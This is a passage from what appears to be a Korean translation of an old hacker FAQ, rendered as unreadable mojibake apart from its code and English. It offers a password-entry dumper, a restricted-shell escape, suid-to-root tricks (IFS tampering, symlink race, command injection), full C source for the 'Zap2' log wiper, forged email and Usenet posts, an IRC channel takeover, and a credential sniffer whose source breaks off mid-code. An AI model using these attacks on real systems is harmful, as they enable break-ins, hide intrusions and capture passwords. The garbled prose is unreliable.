ÀÖ´Â °¢°¢ÀÇ Æнº¿öµå´Â Ưº°ÇÑ ±âÈ£·Î ¹Ù²î¾îÁö¸ç,¹Ù²î¾îÁø Æнº¿öµå´Â ÀÏ ¹Ý »ç¿ëÀÚ°¡ ÀÐÀ» ¼ö ¾ø´Â ÆÄÀÏ·Î ºÐ¸®µÇ¾î ÀúÀåµÈ´Ù. ÀϹÝÀûÀÎ ½Ã½ºÅÛ¿¡¼­ Æнº¿öµå½¦µµÀ®¿¡ ÀÖ ´Â Æнº¿öµå È­ÀÏÀ» ¾Ë¾Æ³»±â À§Çؼ­´Â getpwent() ¸¦ °è¼ÓÇؼ­ È£ÃâÇÏ´Â ¾Æ·¡ÀÇ ÇÁ·Î±×·¥À» ÀÌ ¿ëÇÑ´Ù. ¿¹: #include main() { struct passwd *p; while(p=getpwent()) printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name, p->pw_passwd, p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell); } 4.½¦µµÀ®À¸·Î ¸¸µé¾îÁø Æнº¿öµå È­ÀÏÀº ¾îµð¿¡ À§Ä¡Çϴ°¡? Unix Path Token ----------------------------------------------------------------- AIX 3 /etc/security/passwd ! or /tcb/auth/files// A/UX 3.0s /tcb/files/auth/?/* BSD4.3-Reno /etc/master.passwd * ConvexOS 10 /etc/shadpw * ConvexOS 11 /etc/shadow * DG/UX /etc/tcb/aa/user/ * EP/IX /etc/shadow x HP-UX /.secure/etc/passwd * IRIX 5 /etc/shadow x Linux 1.1 /etc/shadow * OSF/1 /etc/passwd[.dir|.pag] * SCO Unix #.2.x /tcb/auth/files// SunOS4.1+c2 /etc/security/passwd.adjunct ##username SunOS 5.0 /etc/shadow System V Release 4.0 /etc/shadow x System V Release 4.2 /etc/security/* database Ultrix 4 /etc/auth[.dir|.pag] * UNICOS /etc/udb * 5.NIS/yp´Â ¹«¾ùÀΰ¡? Àü¿¡´Â yp (Yellow Pages)¶ó°í ¾Ë·ÁÁ³´ø NIS (Network Information System) ÀÇ ÁÖ ¸ñÀûÀº Æнº ¿öµåÀÚ·á¿Í °°ÀÌ ³×Æ®¿öÅ©¸¦ ±¸¼ºÇÏ´Â ¿©·¯ CONFIGURATION DATE¸¦ ´Ù¾çÇÑ ½Ã½ºÅÛÀÌ °øÀ¯ÇÒ ¼ö ÀÖ µµ·Ï Çϱâ À§ÇØ ¸¸µé¾îÁ³´Ù. ±×·¯³ª ´ÜÁö ½Ã½ºÅÛÀÇ º¸¾ÈÀ» Áõ°¡½Ãų ¸ñÀûÀ¸·Î ¸¸µé¾îÁø °Í¸¸Àº ¾Æ´Ï´Ù. NIS¸¦ ÀÌ¿ëÇϸé /etc/passwd ÆÄÀÏÀº ´ÙÀ½Ã³·³ ¾ÆÁÖ °£´ÜÇØÁø´Ù. ÀÌ ÆÄÀÏÀÇ ³»¿ëÀ» º¸·Á ¸é ypcat passwd¶ó´Â ¸í·É¾î¸¦ ÀÌ¿ëÇÑ´Ù. +::0:0::: 6.'ypcat passwd'¿¡¼­ ÄÞ¸¶µÚ¿¡ ³ª¿À´Â ±â¹¦ÇÑ ¹®ÀÚ´Â ¹«¾ùÀΰ¡? ±× ¹®ÀÚ´Â password aging data¶ó°í ºÒ¸®¸ç,½Ã½ºÅÛ °ü¸®ÀÚ°¡ Á¤ÇÑ ±â°£ÀÌ Áö³ª¸é »ç¿ëÀÚ°¡ Æнº ¿öµå¸¦ º¯°æÇÏ°Ô ÇÏ´Â ¿ªÇÒÀ» ÇÑ´Ù. ] ] ´ÙÀ½Àº 'password aging data'°¡ µé¾îÀÖ´Â /etc/passwd ÆÄÀÏÀÇ ¿¹ÀÌ´Ù. ] ] will:5fg63fhD3d,M.z8:9406:12:Will Spencer:/home/fsg/will:/bin/bash ] ¾Ïȣȭ°¡ µÈ Æнº¿öµå¿¡¼­ ÄÞ¸¶µÚ¿¡ ³ª¿À´Â ¹®ÀÚ´Â password aging mechanismÀ» µû¸¥´Ù. ] ] À§ ¿¹¿¡¼­ Password aging characters´Â ´ÙÀ½°ú °°´Ù. ] ] M.z8 ] 4°³ÀÇ ¹®ÀÚ´Â ´ÙÀ½°ú °°ÀÌ Çؼ®µÈ´Ù. 1 Æнº¿öµå°¡ º¯°æµÇÁö ¾Ê°í »ç¿ëµÉ ¼ö ÀÖ´Â ÃÖ´ë±â°£(ÁÖ ´ÜÀ§) 2 Æнº¿öµå°¡ º¯°æµÇ±â Àü¿¡ »ç¿ëÇؾ߸¸ ÇÏ´Â ÃÖ¼Ò ±â°£(ÁÖ ´ÜÀ§) 3,4 ¼¼°¡Áö Ưº°ÇÑ °æ¿ì°¡ Á¸ÀçÇÑ´Ù. ù¹ø°¿Í ±¸¹ø° ¹®ÀÚ°¡ '..'ÀÎ °æ¿ì,»ç¿ëÀÚ´Â ´ÙÀ½¹ø login¿¡¼­ Æнº¿öµå¸¦ º¯°æÇØ¾ß ÇÑ´Ù. ±×·¯¸é Æнº¿öµå ÇÁ·Î±×·¥Àº password aging characters¸¦ Á¦°ÅÇϹǷΠÂ÷ÈÄ¿¡´Â Æнº¿öµå¸¦ ²À º¯°æÇÒ ÇÊ¿ä´Â ¾ø´Ù. ¼¼¹ø°¿Í ³×¹ø° ¹®ÀÚ°¡ '..'ÀÎ °æ¿ìµµ ¸¶Âù°¡Áö·Î »ç¿ëÀÚ´Â Æнº¿öµå¸¦ º¯°æÇØ¾ß ÇÑ ´Ù. password agingÀº ù¹ø°¿Í µÎ¹ø° ¹®ÀÚ¿¡ Á¤ÀÇµÈ ´ë·Î ÀÌ·ç¾îÁø´Ù. ù¹ø° ¹®ÀÚ(MAX)°¡ µÎ ¹ø° ¹®ÀÚ(MIN)º¸´Ù °ªÀÌ ÀÛÀ» °æ¿ì´Â »ç¿ëÀÚ´Â ±×ÀÇ Æнº¿öµå¸¦ º¯°æÇÒ ¼ö ¾øÀ¸¸ç,root¸¸ÀÌ ¹Ù ²Ü ¼ö ÀÖ´Ù. Password Aging Codes +------------------------------------------------------------------------+ | | | Character: . / 0 1 2 3 4 5 6 7 8 9 A B C D E F G H | | Number: 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 | | | | Character: I J K L M N O P Q R S T U V W X Y Z a b | | Number: 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 | | | | Character: c d e f g h i j k l m n o p q r s t u v | | Number: 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 | | | | Character: w x y z | | Number: 60 61 62 63 | | | +------------------------------------------------------------------------+ 7.VMS¿¡¼­ Æнº¿öµå È­ÀÏ¿¡ ¾î¶»°Ô Á¢±ÙÇÒ ¼ö Àִ°¡? VMS¿¡¼­ Æнº¿öµå ÆÄÀÏÀº SYS$SYSTEM:SYSUAF.DAT À̸ç,À¯´Ð½º¿Í ´Þ¸® ÀÏ¹Ý »ç¿ëÀÚ´Â ÀÌ ÆÄÀÏÀ» ÀÐÀ» ¼ö ¾ø´Ù. 8.VMS Æнº¿öµå¸¦ ¾î¶»°Ô ±ý ¼ö Àִ°¡? SYS$GETUAF ÇÔ¼ö¸¦ ÀÌ¿ëÇÏ¿©,¾ÏȣȭµÈ ´Ü¾î¿Í SYSUAF.DAT ¿¡ ÀÖ´Â ¾ÏȣȭµÈ ÀڷḦ ºñ±³ÇÏ´Â ÇÁ ·Î±×·¥À» ÀÛ¼ºÇÏ¸é °¡´ÉÇÏ´Ù. ±×·¯ÇÑ ¸ñÀûÀ¸·Î ¸¸µé¾îÁø ÇÁ·Î±×·¥Áß¿¡¼­ CHECK_PASSWORD ¿Í GUESS_PASSWORD °¡ ¾Ë·ÁÁ®ÀÖ´Ù. 9.»ç¿ëÀÌ Á¦ÇÑµÈ shellÀ» ¾î¶»°Ô ºüÁ® ³ª¿Ã ¼ö Àִ°¡? shell ±â´ÉÀ» ÁÖÃàÀ¸·Î ÇÏ´Â ÇÁ·Î±×·¥À» ½ÇÇà½ÃÅ°¸é,»ç¿ëÀÚÀÇ ¿µ¿ªÀÌ Á¦ÇÑµÈ shell·ÎºÎÅÍ ºüÁ® ³ª¿Ã ¼ö ÀÖ´Ù. ´ëÇ¥ÀûÀÎ ¿¹°¡ viÀ̸ç,vi¸¦ ½ÇÇà½ÃŲ ÈÄ ´ÙÀ½ ¸í·É¾î¸¦ »ç¿ëÇ϶ó.°è¼ÓÇÏ¿© ´ÙÀ½ ¸í·É¾î¸¦ ÀÔ·ÂÇϸé shell·ÎºÎÅÍ ºü·Á ³ª¿Ã ¼ö ÀÖ´Ù. :set shell=/bin/sh :shell 10.suid script³ª ÇÁ·Î±×·¥À¸·ÎºÎÅÍ root·Î À̵¿ÇÒ ¼ö Àִ°¡? 1. IFS¸¦ º¯°æÇ϶ó. ÇÁ·Î±×·¥ÀÌ system() ÇÔ¼ö¸¦ ÀÌ¿ëÇÏ¿© ´Ù¸¥ ÇÁ·Î±×·¥À» È£ÃâÇϸé,ÇÁ·Î±×·¥À» ¼Ó¿©¼­ IFS¸¦ º¯°æ ÇÒ ¼ö ÀÖ´Ù. IFS´Â ÀÎÀÚ¸¦ ±¸ºÐÇϱâÀ§ÇØ »ç¿ëµÈ´Ù. ÇÁ·Î±×·¥ÀÌ ´ÙÀ½°ú °°Àº ÇÔ¼ö¸¦ »ç¿ëÇÑ´Ù°í °¡Á¤ÇÏÀÚ. system("/bin/date") IFS¸¦ '/' ·Î º¯°æÇϸé shellÀº '/'À» ´ÜÁö bin °ú dateÀ» ±¸ºÐÇϱâ À§ÇÏ¿© »ç¿ëÇϹǷÎ(µð·ºÅ丮 ¸¦ ±¸ºÐÇϱâ À§ÇÑ ¿ªÇÒÀº »ç¶óÁø´Ù) /bin/date À» 'bin date'·Î Çؼ®ÇÏ°Ô µÈ´Ù. ´©±º°¡°¡ 'bin'À̶ó´Â °æ·Î¿¡ ÀÚ½ÅÀÇ ÇÁ·Î±×·¥À» °¡Áö°í ÀÖ´Ù¸é, suid ÇÁ·Î±×·¥Àº /bin/date ´ë ½Å¿¡ ÀÚ½ÅÀÇ ÇÁ·Î±×·¥À» ½ÇÇàÇÏ°Ô µÈ´Ù. IFS¸¦ º¯°æÇϱâ À§ÇÏ¿© ´ÙÀ½ÀÇ ¸í·É¾î¸¦ »ç¿ëÇ϶ó. IFS='/';export IFS # Bourne Shell setenv IFS '/' # C Shell export IFS='/' # Korn Shell 2. script ¸¦ -i¿¡ ¿¬°áÇ϶ó. -i¶ó´Â À̸§À» °¡Áø symbolic link¸¦ ÇÁ·Î±×·¥¿¡ ¸¸µé¾î¶ó. -i¸¦ ½ÇÇà½ÃÅ°¸é shell(bin/sh)À» ´ë È­Çü ¸ðµå·Î ¼öÇàÇÒ °ÍÀÌ´Ù. ÀÌ°ÍÀº suid shell scripts¿¡¼­¸¸ °¡´ÉÇÏ´Ù. ¿¹: % ln suid.sh -i % -i # 3. race conditionÀ» ÀÌ¿ëÇ϶ó. Ä¿³ÎÀÌ /bin/sh¸¦ ¼öÇàÇÏ°í ÀÖ´Â µ¿¾È symbolic link¸¦ ´Ù¸¥ ÇÁ·Î±×·¥À¸·Î ¹Ù²ã¶ó. ¿¹: nice -19 suidprog ; ln -s evilprog suidroot 4. ÇÁ·Î±×·¥¿¡¼­ bad inputÀ» ÀÔ·ÂÇ϶ó. °°Àº ¸í·É¾î ÁÙ¿¡¼­ ÇÁ·Î±×·¥°ú ´Ù¸¥ ¸í·É¾î¸¦ ÇÔ²² ¼öÇàÇ϶ó. ¿¹: suidprog ; id 11.½Ã½ºÅÛ LOG FILE¿¡¼­ ÀÚ½ÅÀÇ ÇØÅ·ÈçÀûÀ» ¾î¶»°Ô Áö¿ï°ÍÀΰ¡? /etc/utmp, /usr/adm/wtmp ±×¸®°í /usr/adm/lastlog ÆÄÀÏÀ» ÆíÁýÇ϶ó. ±×·¯³ª ÀÌ·¯ÇÑ ÆÄÀϵéÀº vi¿Í °°Àº ÀϹÝÀûÀÎ ¿¡µðÅÍ·Î ÆíÁýÇÒ ¼ö ÀÖ´Â ¹®¼­ ÆÄÀÏÀÌ ¾Æ´Ï´Ù. ÀÌ·¯ ÇÑ ¸ñÀûÀ¸·Î Ưº°ÇÏ°Ô Â¥¿©Áø ÇÁ·Î±×·¥À» ÀÌ¿ëÇØ¾ß ÇÑ´Ù. ¿¹: #include #include #include #include #include #include #include #include #define WTMP_NAME "/usr/adm/wtmp" #define UTMP_NAME "/etc/utmp" #define LASTLOG_NAME "/usr/adm/lastlog" int f; void kill_utmp(who) char *who; { struct utmp utmp_ent; if ((f=open(UTMP_NAME,O_RDWR))>=0) { while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 ) if (!strncmp(utmp_ent.ut_name,who,strlen(who))) { bzero((char *)&utmp_ent,sizeof( utmp_ent )); lseek (f, -(sizeof (utmp_ent)), SEEK_CUR); write (f, &utmp_ent, sizeof (utmp_ent)); } close(f); } } void kill_wtmp(who) char *who; { struct utmp utmp_ent; long pos; pos = 1L; if ((f=open(WTMP_NAME,O_RDWR))>=0) { while(pos != -1L) { lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND); if (read (f, &utmp_ent, sizeof (struct utmp))<0) { pos = -1L; } else { if (!strncmp(utmp_ent.ut_name,who,strlen(who))) { bzero((char *)&utmp_ent,sizeof(struct utmp )); lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND); write (f, &utmp_ent, sizeof (utmp_ent)); pos = -1L; } else pos += 1L; } } close(f); } } void kill_lastlog(who) char *who; { struct passwd *pwd; struct lastlog newll; if ((pwd=getpwnam(who))!=NULL) { if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) { lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0); bzero((char *)&newll,sizeof( newll )); write(f, (char *)&newll, sizeof( newll )); close(f); } } else printf("%s: ?\n",who); } main(argc,argv) int argc; char *argv[]; { if (argc==2) { kill_lastlog(argv[1]); kill_wtmp(argv[1]); kill_utmp(argv[1]); printf("Zap2!\n"); } else printf("Error.\n"); } 12.°¡Â¥¸ÞÀÏ(FAKEMAIL)À» ¾î¶»°Ô º¸³»´Â°¡? ¸ÞÀÏÀÌ ¿øÇü´ë·Î ³ªÅ¸³ª±â¸¦ ¿øÇÏ´Â ½Ã½ºÅÛ¿¡ Á¢¼ÓÇÑ ÈÄ, ´ÙÀ½Ã³·³ ¸Þ¼¼Áö¸¦ ÀÛ¼ºÇ϶ó. HELO bellcore.com MAIL FROM:Voyager@bellcore.com RCPT TO:president@whitehouse.gov DATA Please discontinue your silly Clipper initiative. . QUIT RFC 931À» »ç¿ëÇÏ´Â ½Ã½ºÅÛ¿¡¼­´Â "MAIL FROM:"À̶ó´Â ºÎºÐÀº °¡´ÉÇÏÁö ¾Ê´Ù. ¿ì¼± Àڽſ¡°Ô ¸ÞÀÏÀ» º¸³¿À¸·Î½á Å×½ºÆ®¸¦ Çغ»´Ù. ´õ¸¹Àº ÀÚ·á´Â RFC 822 "Standard for the format of ARPA Internet text messages."¸¦ ÂüÁ¶ÇÑ ´Ù. 13.À¯Áî³ÝÀ» ¾î¶»°Ô ¼ÓÀ̴°¡? inews¸¦ »ç¿ëÇÏ¿© ´ÙÀ½ÀÇ ³»¿ëÀ» ÀÔ·ÂÇ϶ó. From: Newsgroups: Subject: Message-ID: Date: Organization: Á¦´ë·ÎµÈ newsgroupÀ» À§ÇØ,inews´Â ´ÙÀ½ÀÇ ³»¿ëÀ» ÇÊ¿ä·Î ÇÑ´Ù. Approved: ±×·¯¸é °Ô½Ã¹°À» ÷°¡ÇÏ°í ¸¦ ÀÌ¿ëÇÏ¿© ³¡³½´Ù. ´ÙÀ½Àº ¿¹ÀÌ´Ù. ¿¹: From: Eric S. Real Newsgroups: alt.hackers Subject: Pathetic bunch of wannabe losers Message-ID: Date: Fri, 13 Aug 1994 12:15:03 Organization: Moral Majority A pathetic bunch of wannabe losers is what most of you are, with no right to steal the honorable title of `hacker' to puff up your silly adolescent egos. Get stuffed, get lost, and go to jail. Eric S. Real ^D ¸¹Àº ½Ã½ºÅÛÀÌ Originator: ¸¦ ¸í±âÇÏ¿© ¸Þ¼¼Áö°¡ ´©±¸·ÎºÎÅÍ ¹ß¼ÛµÇ¾ú´ÂÁö¸¦ ³ªÅ¸³½´Ù´Â Á¡¿¡ ÁÖ¸ñÇØ¾ß ÇÑ´Ù. 14.¾î¶»°Ô IRC(ÀÎÅÍ³Ý Ã¤ÆÃ)ÀÇ CHANOP¿¡ ħÅõÇϴ°¡? IRC·ÎºÎÅÍ ¶³¾îÁ® ³ª¿Â sever¸¦ ã¾Æ¼­ ¿øÇÏ´Â À̸§À¸·Î channelÀ» ¸¸µé¾î¶ó. sever°¡ net¿¡ ´Ù½Ã Á¢¼ÓÇÒ ¶§ ½ÇÁ¦ÀûÀÎ channelÀÌ ÀÖ´Â ChanOp¸¦ ¼ÒÀ¯ÇÏ°Ô µÉ °ÍÀÌ´Ù. sever¿¡¼­ ServerOp ¸¦ °¡Áö°í ÀÖ´Ù¸é ÀǵµÀûÀ¸·Î ºÐ¸®½Ãų ¼ö µµ ÀÖ´Ù. 15.³ªÀÇ »ç¿ëÀÚ À̸§À» ¼û±â·Á¸é IRCŬ¶óÀ̾ðÆ®¸¦ ¾î¶»°Ô ¼öÁ¤Çϴ°¡? cs.bu.edu /irc/clients¿¡ ÀÖ´Â irc.c ¿Í ctcp.c ÀÇ ³»¿ëÀ» º¯°æÇÏ¸é µÈ´Ù. irc.c¿¡¼­´Â »ç¿ëÀÚÀ̸§,ctcp.c¿¡¼­´Â °³ÀÎÁ¤º¸ ºÎºÐÀ» ¼öÁ¤ÇÑ ÈÄ¿¡ ÄÄÆÄÀÏÀ» ÇÏ¿© ½ÇÇàÇÏ¸é µÈ ´Ù. ¿¹: *** ctcp.c.old Wed Feb 10 10:08:05 1993 --- ctcp.c Fri Feb 12 04:33:55 1993 *************** *** 331,337 **** struct passwd *pwd; long diff; int uid; ! char c; /* * sojge complained that ircII says 'idle 1 seconds' --- 331,337 ---- struct passwd *pwd; long diff; int uid; ! char c, *fing; /* * sojge complained that ircII says 'idle 1 seconds' *************** *** 348,354 **** if (uid != DAEMON_UID) { #endif /* DAEMON_UID */ ! if (pwd = getpwuid(uid)) { char *tmp; --- 348,356 ---- if (uid != DAEMON_UID) { #endif /* DAEMON_UID */ ! if (fing = getenv("IRCFINGER")) ! send_ctcp_reply(from, ctcp->name, fing, diff, c); ! else if (pwd = getpwuid(uid)) { char *tmp; *** irc.c.old Wed Feb 10 06:33:11 1993 --- irc.c Fri Feb 12 04:02:11 1993 *************** *** 510,516 **** malloc_strcpy(&my_path, "/"); if (*realname == null(char)) strmcpy(realname, "*Unknown*", REALNAME_LEN); ! if (*username == null(char)) { if (ptr = getenv("USER")) strmcpy(username, ptr, NAME_LEN); --- 510,518 ---- malloc_strcpy(&my_path, "/"); if (*realname == null(char)) strmcpy(realname, "*Unknown*", REALNAME_LEN); ! if (ptr = getenv("IRCUSER")) ! strmcpy(username, ptr, NAME_LEN); ! else if (*username == null(char)) { if (ptr = getenv("USER")) strmcpy(username, ptr, NAME_LEN); 16.ÀÌ»óÇÑ ¹®ÀڷΠǥ½ÃµÈ µð·ºÅ丮·Î À̵¿ÇÏ´Â ¹æ¹ýÀº ¹«¾ùÀΰ¡? directory À̸§¿¡ ÀÌ»óÇÑ ¹®ÀÚ°¡ Ç¥½ÃµÇ¾î ÀÖÀ¸¸é,ÀڷḦ ¼û±â·Á°í Çϰųª »ó¾÷Àû ¿ëµµÀÇ ÇÁ·Î±× ·¥ÀÎ °æ¿ì°¡ ¸¹´Ù. ±×·¯ÇÑ ¹®ÀÚ¸¦ ¾Ë¾Æ³»´Â ¹æ¹ýµéÀº ¸î°¡Áö°¡ Àִµ¥,¸ÕÀú ls¸í·É¾î¸¦ ÀÌ¿ëÇÏ´Â ¹æ¹ýÀ» »ìÆ캸ÀÚ. ls ÀÇ µµ¿ò¸»À» º¸¸é ´ÙÀ½°ú °°Àº ³»¿ëÀÌ ÀÖ´Ù. -F µð·ºÅ丮´Â ``/'',½ÇÇà°¡´ÉÇÑ ÆÄÀÏ¿¡´Â ``*'', ¿¬°á°í¸®¿¡´Â ``@'' ¶ó´Â Ç¥½Ã¸¦ ¸¸µé¾î ÁØ´Ù. -q ÆÄÀÏ¸í¿¡ µé¾îÀÖ´Â ºñ±×·¡ÇÈ ¹®ÀÚµéÀ» ``?''·Î Ç¥½ÃÇØ ÁØ´Ù. -b \ddd¿¡ µé¾îÀÖ´Â ºñ±×·¡ÇÈ ¹®ÀÚµéÀ» 8Áø¼ö·Î Ç¥½ÃÇØÁØ´Ù. ftp·Î ¿¬°áÇÑ °÷ÀÇ µð·ºÅ丮´Â "ls -al filename" À̶ó´Â ¸í·É¾î¸¦ ÀÌ¿ëÇϸé ÁöÁ¤µÈ ÆÄÀϸíÀ¸·Î ÀúÀåÀÌ µÈ´Ù. ÀÌ·¸°Ô ÀúÀåÀÌ µÈ ÆÄÀÏ ¾È¿¡ µé¾î ÀÖ´Â ÀÌ»óÇÑ ¹®ÀÚ°¡ ¹«¾ùÀÎÁö¸¦ Á¤È®È÷ º¸±âÀ§Çؼ­ "cat -t -v -e filename" À̶ó´Â ¸í·É¾î¸¦ ÀÌ¿ëÇϵµ·Ï ÇÑ´Ù. catÀÇ µµ¿ò¸»À» º¸¸é ´ÙÀ½°ú °°Àº ³»¿ëÀÌ ÀÖ´Ù. -v ÀμⰡ ºÒ°¡´ÉÇÑ ¹®ÀÚµéÀ» ³ªÅ¸³½´Ù. Á¦¾î¹®ÀÚ´Â ^X (x), ¿Í °°ÀÌ ³ªÅ¸³­´Ù. <8Áø¼ö·Î 0177>DMS ^?·Î Ç¥½ÃµÈ´Ù. ASCII ¹®ÀÚ°¡ ¾Æ´Ñ °æ¿ì´Â M -x ·Î Ç¥½ÃµÇ´Âµ¥,¿©±â¼­ x´Â high bit¸¦ Á¦¿ÜÇÑ ³ª¸ÓÁö 7°³ÀÇ bit°¡ Ç¥½ÃÇÏ´Â ¹®ÀÚÀÌ´Ù. -t ÅÇÀº ^I,ÆäÀÌÁö ³Ñ±èÀº ^L·Î ³ªÅ¸³»ÁØ´Ù. -v¿Í ÇÔ²² »ç¿ëµÇ¾î¾ß¸¸ ÇÑ´Ù. -e »õ ÁÙÀÌ ½ÃÀ۵DZ⿡ ¾Õ¼­¼­ °¢ ÁÙÀÇ ³¡¿¡ ``$'' À» Ç¥½ÃÇÏ°Ô ÇÑ´Ù. -v¿Í ÇÔ²² »ç¿ëµÇ¾î¾ß ÇÑ´Ù. µð·ºÅ丮 ¸íÀÌ ³ª À» Æ÷ÇÔÇÏ°í ÀÖÀ» °æ¿ì µû¿ÈÇ¥¸¦ ÀÌ¿ëÇØ¾ß ÇÑ´Ù. cd ".." IBM-PC¿¡¼­´Â key ¿Í ASCII Äڵ尪À» ÀÌ¿ëÇϸé Ư¼ö¹®ÀÚ¸¦ ÀÔ·ÂÇÒ ¼ö ÀÖ´Ù. key¸¦ ´©¸¥ »óÅ¿¡¼­ Ư¼ö¹®ÀÚ¿¡ ÇØ´çÇÏ´Â ÄÚµå °ªÀ» ´­·¯ÁØ´Ù. Å°¿¡¼­ ¼ÕÀ» ¶¼¸é ¿øÇÏ´Â ¹®ÀÚ°¡ È­¸é¿¡ ³ªÅ¸³­´Ù. Ư¼ö¹®ÀÚÀÇ ASCIIÄڵ尪À» ¾Ë±â À§Çؼ­ ´Â ÄÚµå Ç¥¸¦ ÂüÁ¶ÇÏ´Â °ÍÀÌ ÁÁ´Ù. ^Z (suspend), ^C (intr)¿Í °°Àº Á¦¾î¹®ÀÚ¸¦ °¡Áø µð·ºÅ丮¸¦ ¸¸µé°íÀÚ ÇÒ °æ¿ì,Á¦¾î¹®ÀÚ¸¦ ´Ù¸¥ ¹®ÀÚ·Î º¯°æÇϱâ À§ÇÏ¿© stty¸¦ »ç¿ëÇÒ ÇÊ¿ä°¡ ÀÖ´Ù. stty¿¡ ´ëÇÑ µµ¿ò¸»À» º¸¸é ´ÙÀ½°ú °°´Ù. Á¦¾î¹®ÀÚ +C´Â Á¦¾î¹®ÀÚ¸¦ C¿¡ ÇÒ´çÇϴµ¥,¿©±â¼­ Á¦¾î¹®ÀÚ´Â erase, kill, intr (interrupt), quit, eof, eol, swtch(switch), start, stop or susp¸¦ ÀǹÌÇÑ´Ù. star¿Í stopÀº Á¦¾î¹®ÀÚ CÇÒ ´ç¿¡¸¸ À¯È¿ÇÏ´Ù. caret (^)ÀÌ Cº¸´Ù ¸ÕÀú ³ª¿À´Â °æ¿ì´Â Á¦¾î¹®ÀÚ¿¡ ÇØ´çÇÑ´Ù. (¿¹¸¦µé¾î ^D´Â À̸ç ^?´Â ,^- ´Â undefined·Î Çؼ®µÈ´Ù.) ÇöÀçÀÇ stty ±âº» ¼³Á¤°ªÀ» º¸·Á¸é stty -a¸¦ ÀÔ·ÂÇÏ¸é µÈ´Ù. 17.ethrnet sniiffing(ÀÌ´õ³Ý Ãßô)Àº ¹«¾ùÀΰ¡? Ethernet sniffing À̶õ,ÀÚ½ÅÀÌ Ã£°íÀÚ ÇÏ´Â Á¤º¸¸¦ ¹ß°ßÇϱâ À§Çؼ­ Àü¼Û»óŸ¦ °¨½ÃÇÏ´Â °ÍÀ» ÀǹÌÇÑ´Ù. Áï ¾î¶² Á¶°Ç¿¡ ¸Â´Â Àڷḣ ÇÁ·Î±×·¥ÀÌ ¹ß°ßÇÏ°Ô µÇ¸é, ±× ³»¿ëÀº ÇÁ·Î±×·¥¿¡ ÀÇÇØ ÆÄÀÏ·Î ÀúÀåÀÌ µÈ´Ù. Á¤º¸¸¦ ¾Ë¾Æ³»±â À§ÇÏ¿© ÀϹÝÀûÀ¸·Î °¡À帹ÀÌ ¾²ÀÌ´Â Á¶°ÇÀº 'login',¶Ç´Â 'password'¿Í °°Àº ´Ü¾îµéÀÌ´Ù. ¸¹Àº Ethernet sniffers °¡ ÀÖÀ¸¸ç,´ÙÀ½Àº ±× ¿¹µéÀÌ´Ù. ½Ã½ºÅÛ¿¡ µû¸¥ ½º´ÏÅÍ¿Í ½º´ÏÆÛ°¡ ÀÖ´Â FTP OS Sniffer ~~ ~~~~~~~ HP/UX nettl (monitor) & netfmt (display) nfswatch /* Available via anonymous ftp */ Irix nfswatch /* Available via anonymous ftp */ Etherman SunOS etherfind nfswatch /* Available via anonymous ftp */ Solaris snoop DOS ETHLOAD /* Available via anonymous ftp as */ /* ethld104.zip */ The Gobbler /* Available via anonymous ftp */ LanPatrol LanWatch Netmon Netwatch Netzhack /* Available via anonymous ftp at */ /* mistress.informatik.unibw-muenchen.de */ /* /pub/netzhack.mac */ Macintosh Etherpeek Here is source code for an ethernet sniffer: /* Esniff.c */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #define ERR stderr char *malloc(); char *device, *ProgName, *LogName; FILE *LOG; int debug=0; #define NIT_DEV "/dev/nit" #define CHUNKSIZE 4096 /* device buffer size */ int if_fd = -1; int Packet[CHUNKSIZE+32]; void Pexit(err,msg) int err; char *msg; { perror(msg); exit(err); } void Zexit(err,msg) int err; char *msg; { fprintf(ERR,msg); exit(err); } #define IP ((struct ip *)Packet) #define IP_OFFSET (0x1FFF) #define SZETH (sizeof(struct ether_header)) #define IPLEN (ntohs(ip->ip_len)) #define IPHLEN (ip->ip_hl) #define TCPOFF (tcph->th_off) #define IPS (ip->ip_src) #define IPD (ip->ip_dst) #define TCPS (tcph->th_sport) #define TCPD (tcph->th_dport) #define IPeq(s,t) ((s).s_addr == (t).s_addr) #define TCPFL(FLAGS) (tcph->th_flags & (FLAGS)) #define MAXBUFLEN (128) time_t LastTIME = 0; struct CREC { struct CREC *Next, *Last; time_t Time; /* start time */ struct in_addr SRCip, DSTip; u_int SRCport, /* src/dst ports */ DSTport; u_char Data[MAXBUFLEN+2]; /* important stuff :-) */ u_int Length; /* current data length */ u_int PKcnt; /* # pkts */ u_long LASTseq; }; struct CREC *CLroot = NULL; char *Symaddr(ip) register struct in_addr ip; { register struct hostent *he = gethostbyaddr((char *)&ip.s_addr, sizeof(struct in_addr),AF_INET); return( (he)?(he->h_name):(inet_ntoa(ip)) ); } char *TCPflags(flgs) register u_char flgs; { static char iobuf[8]; #define SFL(P,THF,C) iobuf[P]=((flgs & THF)?C:'-') SFL(0,TH_FIN, 'F'); SFL(1,TH_SYN, 'S'); SFL(2,TH_RST, 'R'); SFL(3,TH_PUSH,'P'); SFL(4,TH_ACK, 'A'); SFL(5,TH_URG, 'U'); iobuf[6]=0; return(iobuf); } char *SERVp(port) register u_int port; { static char buf[10]; register char *p; switch(port) { case IPPORT_LOGINSERVER: p="rlogin"; break; case IPPORT_TELNET: p="telnet"; break; case IPPORT_SMTP: p="smtp"; break; case IPPORT_FTP: p="ftp"; break; default: sprintf(buf,"%u",port); p=buf; break; } return(p); } char *Ptm(t) register time_t *t; { register char *p = ctime(t); p[strlen(p)-6]=0; /* strip " YYYY\n" */ return(p); } char *NOWtm() { time_t tm; time(&tm); return( Ptm(&tm) ); } #define MAX(a,b) (((a)>(b))?(a):(b)) #define MIN(a,b) (((a)<(b))?(a):(b)) /* add an item */ #define ADD_NODE(SIP,DIP,SPORT,DPORT,DATA,LEN) { \ register struct CREC *CLtmp = \ (struct CREC *)malloc(sizeof(struct CREC)); \ time( &(CLtmp->Time) ); \ CLtmp->SRCip.s_addr = SIP.s_addr; \ CLtmp->DSTip.s_addr = DIP.s_addr; \ CLtmp->SRCport = SPORT; \ CLtmp->DSTport = DPORT; \ CLtmp->Length = MIN(LEN,MAXBUFLEN); 